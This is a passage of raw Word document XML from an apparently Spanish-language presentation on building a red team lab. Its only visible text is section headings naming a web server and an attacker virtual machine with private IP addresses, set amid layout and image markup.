        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="581" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="740" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F1AEB5F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.3.2 Configuración de máquinas virtuales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C49FE9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="003785FD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="532"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1BF44E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2131"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15798784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02A325CD" wp14:editId="47EDD827">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7505531</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1119445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4116704" cy="4431030"/>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4" cy="4431030"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4116704" cy="4431030"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="341" name="Image 341"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId157" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4116662" cy="4430435"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="342" name="Image 342"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId158" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164761" y="164675"/>
                            <a:ext cx="3800855" cy="4114800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="40036160" id="Group 340" o:spid="_x0000_s1026" style="position:absolute;margin-left:591pt;margin-top:-88.15pt;width:324.15pt;height:348.9pt;z-index:15798784;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="41167,443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">
                <v:shape id="Image 341" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:41166;height:4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">
                  <v:imagedata r:id="rId159" o:title=""/>
                </v:shape>
                <v:shape id="Image 342" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1647;top:1646;width:3800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">
                  <v:imagedata r:id="rId160" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación del servidor web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6478336B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="741"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72598B6D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1612"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación y configuración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7046C297" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2332"/>
        </w:tabs>
        <w:spacing w:before="564"/>
        <w:ind w:left="2332" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servidor Web [ 192.168.50.3, 10.10.10.5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A40D92" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="840" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A97779" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="573"/>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799296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A8A303B" wp14:editId="72690CAA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7447740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>768026</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3477895" cy="530860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7895" cy="5308600"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3477895" cy="5308600"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="344" name="Image 344"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId161" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3477862" cy="5308231"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="345" name="Image 345"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId162" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164639" y="164661"/>
                            <a:ext cx="3162300" cy="4992624"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="346" name="Textbox 346"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1581959" y="3810070"/>
                            <a:ext cx="1419225" cy="368935"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="E7E6E6"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2097B997" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="66"/>
                                <w:ind w:left="145"/>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>192.168.50.2</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="347" name="Textbox 347"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="501443" y="3828357"/>
                            <a:ext cx="623570" cy="386080"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="573BF221" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="67"/>
                                <w:ind w:left="146"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="38"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-5"/>
                                  <w:sz w:val="38"/>
                                </w:rPr>
                                <w:t>EXT</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="0A8A303B" id="Group 343" o:spid="_x0000_s1170" style="position:absolute;margin-left:586.45pt;margin-top:60.45pt;width:273.85pt;height:418pt;z-index:15799296;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="34778,530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">
                <v:shape id="Image 344" o:spid="_x0000_s1171" type="#_x0000_t75" style="position:absolute;width:34778;height:5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">
                  <v:imagedata r:id="rId163" o:title=""/>
                </v:shape>
                <v:shape id="Image 345" o:spid="_x0000_s1172" type="#_x0000_t75" style="position:absolute;left:1646;top:1646;width:31623;height:4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">
                  <v:imagedata r:id="rId164" o:title=""/>
                </v:shape>
                <v:shape id="Textbox 346" o:spid="_x0000_s1173" type="#_x0000_t202" style="position:absolute;left:15819;top:38100;width:1419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" fillcolor="#e7e6e6" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2097B997" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="66"/>
                          <w:ind w:left="145"/>
                          <w:rPr>
                            <w:color w:val="000000"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="000000"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>192.168.50.2</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Textbox 347" o:spid="_x0000_s1174" type="#_x0000_t202" style="position:absolute;left:5014;top:38283;width:62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" fillcolor="black" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="573BF221" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="67"/>
                          <w:ind w:left="146"/>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="000000"/>
                            <w:sz w:val="38"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-5"/>
                            <w:sz w:val="38"/>
                          </w:rPr>
                          <w:t>EXT</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D594A34" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1808"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1808" w:hanging="944"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Configuración de la máquina atacante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2580804A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="742"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC650BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1315"/>
        </w:tabs>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalación y configuración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13D21A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2034"/>
        </w:tabs>
        <w:spacing w:before="564"/>
        <w:ind w:left="2034" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Máquina atacante </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[ 192.168.50.2 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7003D1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1200" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="774F30A1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:line="977" w:lineRule="exact"/>
        <w:ind w:left="3927"/>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385728" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4317CFAB" wp14:editId="03869AFB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="679450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794500"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="6794500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="349" name="Graphic 349"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1325880">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="350" name="Image 350"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId165" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3218594" y="1353231"/>
                            <a:ext cx="5741094" cy="5440861"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="351" name="Image 351"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId166" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3383279" y="1517903"/>
                            <a:ext cx="5425439" cy="5125212"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="405CCE8C" id="Group 348" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:535pt;z-index:-17930752;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121920,679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">
                <v:shape id="Graphic 349" o:spid="_x0000_s1027" style="position:absolute;width:121920;height:13258;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m12192000,l,,,1325879r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 350" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:32185;top:13532;width:57411;height:5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">
                  <v:imagedata r:id="rId167" o:title=""/>
                </v:shape>
                <v:shape id="Image 351" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:33832;top:15179;width:54255;height:5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">
                  <v:imagedata r:id="rId168" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2.4 Configuración interna del Laboratorio del Equipo Rojo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34098A2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D069339" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304AD85C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425B1591" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5734D7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B92FBCB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D24C7F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECD955A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FE78938" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
